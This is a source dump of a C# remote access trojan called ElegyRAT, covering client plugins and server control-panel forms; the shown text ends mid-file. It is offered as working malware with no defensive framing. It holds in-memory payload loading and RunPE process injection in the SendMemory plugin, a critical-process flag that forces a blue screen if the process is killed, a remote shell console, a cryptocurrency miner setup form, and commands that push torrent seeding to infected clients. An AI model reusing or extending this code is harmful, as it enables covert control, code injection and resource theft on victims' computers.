--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace Plugin.StreamLibrary.src
5 | {
6 | public class NativeMethods
7 | {
8 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
9 | public static extern unsafe int memcmp(byte* ptr1, byte* ptr2, uint count);
10 |
11 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
12 | public static extern int memcmp(IntPtr ptr1, IntPtr ptr2, uint count);
13 |
14 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
15 | public static extern int memcpy(IntPtr dst, IntPtr src, uint count);
16 |
17 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
18 | public static extern unsafe int memcpy(void* dst, void* src, uint count);
19 | }
20 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SendFile", "SendFile\SendFile.csproj", "{8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {7C37EDD7-F956-4399-BA52-FD089A972A6A}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/Methods.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.IO;
6 | using System.IO.Compression;
7 | using System.Linq;
8 | using System.Runtime.InteropServices;
9 | using System.Security.Principal;
10 | using System.Text;
11 | using System.Threading;
12 |
13 | namespace Plugin
14 | {
15 | public static class Methods
16 | {
17 | private const string Alphabet = "abcdefghijklmnopqrstuvwxyz";
18 |
19 | public static Random Random = new Random();
20 | public static string GetRandomString(int length)
21 | {
22 | StringBuilder randomName = new StringBuilder(length);
23 | for (int i = 0; i < length; i++)
24 | randomName.Append(Alphabet[Random.Next(Alphabet.Length)]);
25 |
26 | return randomName.ToString();
27 | }
28 |
29 | public static void ClientExit()
30 | {
31 | try
32 | {
33 | if (Convert.ToBoolean(Plugin.BDOS) && IsAdmin())
34 | ProcessCriticalExit();
35 | CloseMutex();
36 | Connection.SslClient?.Close();
37 | Connection.TcpClient?.Close();
38 | }
39 | catch { }
40 | }
41 |
42 | public static bool IsAdmin()
43 | {
44 | return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
45 | }
46 |
47 | public static void CloseMutex()
48 | {
49 | if (Plugin.AppMutex != null)
50 | {
51 | Plugin.AppMutex.Close();
52 | Plugin.AppMutex = null;
53 | }
54 | }
55 |
56 | public static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
57 | {
58 | if (Convert.ToBoolean(Plugin.BDOS) && Methods.IsAdmin())
59 | ProcessCriticalExit();
60 | }
61 |
62 | public static void ProcessCriticalExit()
63 | {
64 | try
65 | {
66 | RtlSetProcessIsCritical(0, 0, 0);
67 | }
68 | catch
69 | {
70 | while (true)
71 | {
72 | Thread.Sleep(100000); //prevents a BSOD on exit failure
73 | }
74 | }
75 | }
76 |
77 | [DllImport("ntdll.dll", SetLastError = true)]
78 | private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
79 | }
80 | }
81 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/Packet.cs:
--------------------------------------------------------------------------------
1 | using Plugin.Handler;
2 | using MessagePackLib.MessagePack;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.Diagnostics;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Management;
9 | using System.Runtime.InteropServices;
10 | using System.Text;
11 | using System.Threading;
12 | using System.Windows.Forms;
13 |
14 | namespace Plugin
15 | {
16 | public static class Packet
17 | {
18 | public static void Read(object data)
19 | {
20 | try
21 | {
22 | MsgPack unpack_msgpack = new MsgPack();
23 | unpack_msgpack.DecodeFromBytes((byte[])data);
24 | switch (unpack_msgpack.ForcePathObject("Packet").AsString)
25 | {
26 | case "sendFile":
27 | {
28 | new HandleSendTo().SendToDisk(unpack_msgpack);
29 | break;
30 | }
31 | }
32 | }
33 | catch (Exception ex)
34 | {
35 | Error(ex.Message);
36 | }
37 | }
38 |
39 | public static void Error(string ex)
40 | {
41 | MsgPack msgpack = new MsgPack();
42 | msgpack.ForcePathObject("Packet").AsString = "Error";
43 | msgpack.ForcePathObject("Error").AsString = ex;
44 | Connection.Send(msgpack.Encode2Bytes());
45 | }
46 |
47 | public static void Log(string message)
48 | {
49 | MsgPack msgpack = new MsgPack();
50 | msgpack.ForcePathObject("Packet").AsString = "Logs";
51 | msgpack.ForcePathObject("Message").AsString = message;
52 | Connection.Send(msgpack.Encode2Bytes());
53 | }
54 | }
55 |
56 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 | using System.Net.Sockets;
3 | using System.Security.Cryptography.X509Certificates;
4 | using System.Threading;
5 |
6 | namespace Plugin
7 | {
8 | public class Plugin
9 | {
10 | public static Socket Socket;
11 | public static Mutex AppMutex;
12 | public static string Mutex;
13 | public static string BDOS;
14 | public static string Install;
15 | public static string InstallFile;
16 |
17 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
18 | {
19 | Debug.WriteLine("Plugin Invoked");
20 | AppMutex = mutex;
21 | Mutex = mtx;
22 | BDOS = bdos;
23 | Install = install;
24 | Socket = socket;
25 | Connection.ServerCertificate = certificate;
26 | Connection.Hwid = hwid;
27 | new Thread(() =>
28 | {
29 | Connection.InitializeClient(msgPack);
30 | }).Start();
31 |
32 | while (Connection.IsConnected)
33 | {
34 | Thread.Sleep(1000);
35 | }
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("8de42da3-be99-4e7e-a3d2-3f65e7c1abce")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendFile/SendFile/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30002.166
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SendMemory", "SendMemory\SendMemory.csproj", "{0E423DD6-FAAF-4A66-8828-6A5A5F22269B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {0E423DD6-FAAF-4A66-8828-6A5A5F22269B}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {960A4538-1F35-45D9-8EDB-FCC72A709A7D}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory/Handler/HandleSendTo.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Reflection;
5 | using System.Runtime.InteropServices;
6 | using System.Threading;
7 | using MessagePackLib.MessagePack;
8 |
9 | namespace Plugin.Handler
10 | {
11 | public class HandleSendTo
12 | {
13 | public void ToMemory(MsgPack unpack_msgpack)
14 | {
15 | try
16 | {
17 | byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
18 | string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
19 | if (injection.Length == 0)
20 | {
21 | //Reflection
22 | new Thread(delegate ()
23 | {
24 | try
25 | {
26 | Assembly loader = Assembly.Load(Zip.Decompress(buffer));
27 | object[] parm = null;
28 | if (loader.EntryPoint.GetParameters().Length > 0)
29 | {
30 | parm = new object[] { new string[] { null } };
31 | }
32 | loader.EntryPoint.Invoke(null, parm);
33 | }
34 | catch (Exception ex)
35 | {
36 | Packet.Error(ex.Message);
37 | }
38 | })
39 | { IsBackground = false }.Start();
40 |
41 | }
42 | else
43 | {
44 | //RunPE
45 | new Thread(delegate ()
46 | {
47 | try
48 | {
49 | SendToMemory.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Zip.Decompress(buffer));
50 | }
51 | catch (Exception ex)
52 | {
53 | Packet.Error(ex.Message);
54 | }
55 | })
56 | { IsBackground = false }.Start();
57 | }
58 | }
59 | catch (Exception ex)
60 | {
61 | Packet.Error(ex.Message);
62 | }
63 | Connection.Disconnected();
64 | }
65 | }
66 |
67 | }
68 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory/Packet.cs:
--------------------------------------------------------------------------------
1 | using Plugin.Handler;
2 | using MessagePackLib.MessagePack;
3 | using System;
4 |
5 | namespace Plugin
6 | {
7 | public static class Packet
8 | {
9 | public static void Read(object data)
10 | {
11 | try
12 | {
13 | MsgPack unpack_msgpack = new MsgPack();
14 | unpack_msgpack.DecodeFromBytes((byte[])data);
15 | switch (unpack_msgpack.ForcePathObject("Packet").AsString)
16 | {
17 | case "sendMemory":
18 | {
19 | new HandleSendTo().ToMemory(unpack_msgpack);
20 | break;
21 | }
22 | }
23 | }
24 | catch (Exception ex)
25 | {
26 | Error(ex.Message);
27 | }
28 | }
29 |
30 | public static void Error(string ex)
31 | {
32 | MsgPack msgpack = new MsgPack();
33 | msgpack.ForcePathObject("Packet").AsString = "Error";
34 | msgpack.ForcePathObject("Error").AsString = ex;
35 | Connection.Send(msgpack.Encode2Bytes());
36 | }
37 |
38 | public static void Log(string message)
39 | {
40 | MsgPack msgpack = new MsgPack();
41 | msgpack.ForcePathObject("Packet").AsString = "Logs";
42 | msgpack.ForcePathObject("Message").AsString = message;
43 | Connection.Send(msgpack.Encode2Bytes());
44 | }
45 | }
46 |
47 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 | using System.Net.Sockets;
3 | using System.Security.Cryptography.X509Certificates;
4 | using System.Threading;
5 |
6 | namespace Plugin
7 | {
8 | public class Plugin
9 | {
10 | public static Socket Socket;
11 | public static Mutex AppMutex;
12 | public static string Mutex;
13 | public static string BDOS;
14 | public static string Install;
15 | public static string InstallFile;
16 |
17 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
18 | {
19 | Debug.WriteLine("Plugin Invoked");
20 | AppMutex = mutex;
21 | Mutex = mtx;
22 | BDOS = bdos;
23 | Install = install;
24 | Socket = socket;
25 | Connection.ServerCertificate = certificate;
26 | Connection.Hwid = hwid;
27 | new Thread(() =>
28 | {
29 | Connection.InitializeClient(msgPack);
30 | }).Start();
31 |
32 | while (Connection.IsConnected)
33 | {
34 | Thread.Sleep(1000);
35 | }
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 |
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | // Major Version
27 | // Minor Version
28 | // Build Number
29 | // Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.0.0.0")]
36 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/SendMemory/SendMemory/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/ReadMe.txt:
--------------------------------------------------------------------------------
1 | - If ElegyRAT didn't open, then you need to open CMD as admin and type (lodctr /r) https://prnt.sc/ot1mna
2 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Algorithm/GetHash.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Security.Cryptography;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 |
9 | namespace Server.Algorithm
10 | {
11 | public static class GetHash
12 | {
13 | public static string GetChecksum(string file)
14 | {
15 | using (FileStream stream = File.OpenRead(file))
16 | {
17 | SHA256Managed sha = new SHA256Managed();
18 | byte[] checksum = sha.ComputeHash(stream);
19 | return BitConverter.ToString(checksum).Replace("-", String.Empty);
20 | }
21 | }
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Algorithm/Sha256.cs:
--------------------------------------------------------------------------------
1 | using System.Security.Cryptography;
2 | using System.Text;
3 |
4 | namespace Server.Algorithm
5 | {
6 | public static class Sha256
7 | {
8 | public static string ComputeHash(string input)
9 | {
10 | byte[] data = Encoding.UTF8.GetBytes(input);
11 |
12 | using (SHA256Managed sha = new SHA256Managed())
13 | {
14 | data = sha.ComputeHash(data);
15 | }
16 |
17 | StringBuilder hash = new StringBuilder();
18 |
19 | foreach (byte _byte in data)
20 | hash.Append(_byte.ToString("X2"));
21 |
22 | return hash.ToString().ToUpper();
23 | }
24 |
25 | public static byte[] ComputeHash(byte[] input)
26 | {
27 | using (SHA256Managed sha = new SHA256Managed())
28 | {
29 | return sha.ComputeHash(input);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Algorithm/Zip.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.IO.Compression;
4 | using System.Threading.Tasks;
5 |
6 | namespace Server.Algorithm
7 | {
8 | public static class Zip
9 | {
10 | public static byte[] Decompress(byte[] input)
11 | {
12 | using (var source = new MemoryStream(input))
13 | {
14 | byte[] lengthBytes = new byte[4];
15 | source.Read(lengthBytes, 0, 4);
16 |
17 | var length = BitConverter.ToInt32(lengthBytes, 0);
18 | using (var decompressionStream = new GZipStream(source,
19 | CompressionMode.Decompress))
20 | {
21 | var result = new byte[length];
22 | decompressionStream.Read(result, 0, length);
23 | return result;
24 | }
25 | }
26 | }
27 |
28 | public static byte[] Compress(byte[] input)
29 | {
30 | using (var result = new MemoryStream())
31 | {
32 | var lengthBytes = BitConverter.GetBytes(input.Length);
33 | result.Write(lengthBytes, 0, 4);
34 |
35 | using (var compressionStream = new GZipStream(result,
36 | CompressionMode.Compress))
37 | {
38 | compressionStream.Write(input, 0, input.Length);
39 | compressionStream.Flush();
40 |
41 | }
42 | return result.ToArray();
43 | }
44 | }
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Connection/Listener.cs:
--------------------------------------------------------------------------------
1 | using System.Net;
2 | using System.Net.Sockets;
3 | using System;
4 | using System.Windows.Forms;
5 | using System.Drawing;
6 | using Server.Handle_Packet;
7 | using System.Diagnostics;
8 |
9 | namespace Server.Connection
10 | {
11 | class Listener
12 | {
13 | private Socket Server { get; set; }
14 |
15 | public void Connect(object port)
16 | {
17 | try
18 | {
19 | IPEndPoint ipEndPoint = new IPEndPoint(IPAddress.Any, Convert.ToInt32(port));
20 | Server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
21 | {
22 | SendBufferSize = 50 * 1024,
23 | ReceiveBufferSize = 50 * 1024,
24 | };
25 | Server.Bind(ipEndPoint);
26 | Server.Listen(500);
27 | //new HandleLogs().Addmsg($"Listenning {port}", Color.Green);
28 | new HandleLogs().Addmsg($"正在监听端口 {port}", Color.Green);
29 | Server.BeginAccept(EndAccept, null);
30 | }
31 | catch (Exception ex)
32 | {
33 | MessageBox.Show(ex.Message);
34 | Environment.Exit(0);
35 | }
36 | }
37 |
38 | private void EndAccept(IAsyncResult ar)
39 | {
40 | try
41 | {
42 | new Clients(Server.EndAccept(ar));
43 | }
44 | catch { }
45 | finally
46 | {
47 | Server.BeginAccept(EndAccept, null);
48 | }
49 | }
50 | }
51 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/Form1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Forms/Form1.zip
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormAbout.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Windows.Forms;
10 |
11 | namespace Server.Forms
12 | {
13 | public partial class FormAbout : Form
14 | {
15 | public FormAbout()
16 | {
17 | InitializeComponent();
18 | }
19 |
20 | private void FormAbout_Load(object sender, EventArgs e)
21 | {
22 |
23 | }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormBuilder.Designer.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Forms/FormBuilder.Designer.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormFileSearcher.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Windows.Forms;
10 |
11 | namespace Server.Forms
12 | {
13 | public partial class FormFileSearcher : Form
14 | {
15 | public FormFileSearcher()
16 | {
17 | InitializeComponent();
18 | }
19 |
20 | private void btnOk_Click(object sender, EventArgs e)
21 | {
22 | if (!string.IsNullOrWhiteSpace(txtExtnsions.Text) && numericUpDown1.Value > 0)
23 | {
24 | this.DialogResult = DialogResult.OK;
25 | }
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormMiner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Windows.Forms;
10 |
11 | namespace Server.Forms
12 | {
13 | public partial class FormMiner : Form
14 | {
15 | public FormMiner()
16 | {
17 | InitializeComponent();
18 | }
19 |
20 | private void BtnOK_Click(object sender, EventArgs e)
21 | {
22 | if (!string.IsNullOrWhiteSpace(txtPool.Text) && !string.IsNullOrWhiteSpace(txtWallet.Text) && !string.IsNullOrWhiteSpace(txtPass.Text))
23 | {
24 | this.DialogResult = DialogResult.OK;
25 | Properties.Settings.Default.Save();
26 | this.Hide();
27 | }
28 | }
29 |
30 | private void FormMiner_Load(object sender, EventArgs e)
31 | {
32 | try
33 | {
34 | comboInjection.SelectedIndex = 0;
35 | txtPool.Text = Properties.Settings.Default.txtPool;
36 | txtWallet.Text = Properties.Settings.Default.txtWallet;
37 | txtPass.Text = Properties.Settings.Default.txtxmrPass;
38 | }
39 | catch { }
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormPassword.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Windows.Forms;
10 |
11 | namespace Server.Forms
12 | {
13 | public partial class FormPassword : Form
14 | {
15 | public FormPassword()
16 | {
17 | InitializeComponent();
18 | }
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormShell.cs:
--------------------------------------------------------------------------------
1 | using Server.MessagePack;
2 | using Server.Connection;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.ComponentModel;
6 | using System.Data;
7 | using System.Diagnostics;
8 | using System.Drawing;
9 | using System.Linq;
10 | using System.Text;
11 | using System.Threading;
12 | using System.Threading.Tasks;
13 | using System.Windows.Forms;
14 |
15 | namespace Server.Forms
16 | {
17 | public partial class FormShell : Form
18 | {
19 | public Form1 F { get; set; }
20 | internal Clients Client { get; set; }
21 |
22 | public FormShell()
23 | {
24 | InitializeComponent();
25 | }
26 |
27 | private void TextBox1_KeyDown(object sender, KeyEventArgs e)
28 | {
29 | if (Client != null)
30 | if (e.KeyData == Keys.Enter && !string.IsNullOrWhiteSpace(textBox1.Text))
31 | {
32 | if (textBox1.Text == "cls".ToLower())
33 | {
34 | richTextBox1.Clear();
35 | textBox1.Clear();
36 | }
37 | if (textBox1.Text == "exit".ToLower())
38 | {
39 | this.Close();
40 | }
41 | MsgPack msgpack = new MsgPack();
42 | msgpack.ForcePathObject("Packet").AsString = "shellWriteInput";
43 | msgpack.ForcePathObject("WriteInput").AsString = textBox1.Text;
44 | ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
45 | textBox1.Clear();
46 | }
47 | }
48 |
49 | private void FormShell_FormClosed(object sender, FormClosedEventArgs e)
50 | {
51 | MsgPack msgpack = new MsgPack();
52 | msgpack.ForcePathObject("Packet").AsString = "shellWriteInput";
53 | msgpack.ForcePathObject("WriteInput").AsString = "exit";
54 | ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
55 | }
56 |
57 | private void Timer1_Tick(object sender, EventArgs e)
58 | {
59 | try
60 | {
61 | if (!Client.TcpClient.Connected) this.Close();
62 | }
63 | catch { this.Close(); }
64 | }
65 | }
66 | }
67 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Forms/FormTorrent.cs:
--------------------------------------------------------------------------------
1 | using Server.MessagePack;
2 | using Server.Connection;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.ComponentModel;
6 | using System.Data;
7 | using System.Drawing;
8 | using System.IO;
9 | using System.Linq;
10 | using System.Text;
11 | using System.Threading;
12 | using System.Threading.Tasks;
13 | using System.Windows.Forms;
14 | using Server.Algorithm;
15 |
16 | namespace Server.Forms
17 | {
18 | public partial class FormTorrent : Form
19 | {
20 | private bool IsOk = false;
21 | public FormTorrent()
22 | {
23 | InitializeComponent();
24 | }
25 |
26 | private void Button1_Click(object sender, EventArgs e)
27 | {
28 | OpenFileDialog openFileDialog = new OpenFileDialog();
29 | openFileDialog.Filter = "(*.torrent)|*.torrent";
30 | if (openFileDialog.ShowDialog() == DialogResult.OK)
31 | {
32 | textBox1.Text = openFileDialog.FileName;
33 | IsOk = true;
34 | }
35 | else
36 | {
37 | textBox1.Text = "";
38 | IsOk = false;
39 | }
40 | }
41 |
42 | private void Button3_Click(object sender, EventArgs e)
43 | {
44 | this.Close();
45 | }
46 |
47 | private void Button2_Click(object sender, EventArgs e)
48 | {
49 | try
50 | {
51 | if (!IsOk) return;
52 | MsgPack packet = new MsgPack();
53 | packet.ForcePathObject("Packet").AsString = "torrent";
54 | packet.ForcePathObject("Option").AsString = "seed";
55 | packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(textBox1.Text));
56 |
57 | MsgPack msgpack = new MsgPack();
58 | msgpack.ForcePathObject("Packet").AsString = "plugin";
59 | msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
60 |
61 | msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
62 |
63 |
64 | foreach (ListViewItem itm in Program.form1.listView1.SelectedItems)
65 | {
66 | Clients client = (Clients)itm.Tag;
67 | ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
68 | }
69 | this.Close();
70 | }
71 | catch (Exception ex) { MessageBox.Show(ex.Message); }
72 | }
73 | }
74 | }
75 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleChat.cs:
--------------------------------------------------------------------------------
1 | using Server.Forms;
2 | using Server.MessagePack;
3 | using Server.Connection;
4 | using System;
5 | using System.Collections.Generic;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading;
9 | using System.Threading.Tasks;
10 | using System.Windows.Forms;
11 |
12 | namespace Server.Handle_Packet
13 | {
